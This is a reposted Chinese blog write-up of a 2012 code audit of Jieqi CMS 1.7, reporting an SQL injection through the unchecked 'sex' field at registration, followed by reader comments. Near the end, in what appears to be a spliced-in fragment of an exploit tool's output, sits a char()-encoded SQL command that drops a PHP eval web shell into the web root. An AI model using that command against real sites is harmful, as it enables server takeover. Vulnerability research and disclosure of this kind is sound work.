【PHP】杰奇CMS ( 2012-04-24 老系统内容 CMS PHP

  • A+
所属分类:lcx

杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS,目前的最新版本是1.7,在小说类的站中使用率还是比较高的,这几天花了点时间看了一下他的代码,觉得挺有意思的,跟大家分享一下。

整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入libdatabasedatabase.php中组合SQL语句,再带入到jieqimysqldatabase类(libdatabasemysqldb.php)的query方法进行最后的执行。

仔细查看后发现不可利用,因为如果是数字型的变量,带入到database.php时会进行is_numeric检查;如果是字符串型会进行转义,尝试了宽字节注入,但很可惜的是dp.php中有一句“character_set_client=binary”,也就是说php程序在与mysql交互的时候使用二进制字符集查询,瞬间绝望了。

再留意了一下,发现程序中并没有转码的操作,所以宽字节注入这条路就彻底不行了。

这是一个不好的信号,因为程序中基本上所有的字符串型都会进行转义操作,我就不可能跳出魔术引号了。

又黑盒看了一下,后台的一个地方会显示用户留言时的IP,IP是插在数据库中的,于是考虑了一下能不能伪造IP,看看能否利用来注入或者xss。

分析之后得出获取IP函数是jieqi_userip (/global.php),采用HTTP_CLIENT_IP的方式来获取的,可以伪造,但很蛋疼的是jieqi_userip在获取了IP之后会把小数点替换为空,再进行is_numeric判断 - - || ,又白高兴了。

接着找了一下xss,1.7没有找到xss,1.6有几个反射型xss。

再接再厉,又看了一下其他一些地方,但都没太大的突破,最后看到注册那一块的时候,发现了一些问题。

处理注册的页面是/register.php,post过去的参数有username、password、repassword、email、sex、qq、url、action,跟了一下,发现是这样一个流程:依次带入到/regcheck.php中检查username是否合法,username是否重复,password是否等于repassword,email是否合法,email是否重复。也就是说sex、qq、url并没有进行检查,但是qq和url在数据库中是varchar型,cms会把这两个参数当字符串处理,也就是说如果出现单引号的话会进行转义,前面已经说过了,无法跳出魔术引号。

很幸运的是,程序猿百密一疏,天真的认为sex在前台是以单选框显示出来的,只有0、1、2这三种可能性,所以没进行is_numeric判断,直接带入到数据库中,那么就可以利用了。

总结一下,通过这几天的审计,我觉得其实那个作者安全意识挺高的,对于常见安全性问题都做了相应的防范,在一次次发现我想到的地方作者也想到了而失望的同时,也挺佩服作者的安全意识的,希望作者在看到本文时能及时修补。另外,以上的个人分析如果有什么不足的地方还望各位大牛补充,如果大家发现了1.7版本其他的一些问题或者是其他更好的后台get webshell的方法,请告诉我一声,共同交流,共同进步,thx :)

 [系统信息]  (Get Path)
[ ] [数据维护] -> [数据库升级] 
[ ] 执行 [ select concat(char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)) into dumpfile 'C:\\wwwroot\\1.php' ]
[ ] http://localhost/1.php (password:cmd)
+---------------------------------------------------------------------------+
');
?>

转自:http://www.90sec.org/thread-2155-1-1.html

留言评论(旧系统):

【匿名者】 @ 2012-04-24 22:15:07

90sec是t00ls来的?

本站回复:

不是,高仿 t00ls 的模板,照搬的管理模式,看起来一摸一样,实际上完全没有任何联系。

kyocc @ 2013-02-07 14:23:22

好不容易碰到一个jieqi 然后发现方法无效。。[系统工具] -> [系统信息] 首先这里或许的是网站根目录不是网站目录。。要想获取需要的还是难啊。。另外getwebshell就不用说了,不管用,博客主有好办法吗?

本站回复:

没有。

文章来源于lcx.cc:【PHP】杰奇CMS (

2012-04-24

老系统内容
CMS
PHP
SQL
漏洞
注入

约 1884 字
预计阅读 4 分钟

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: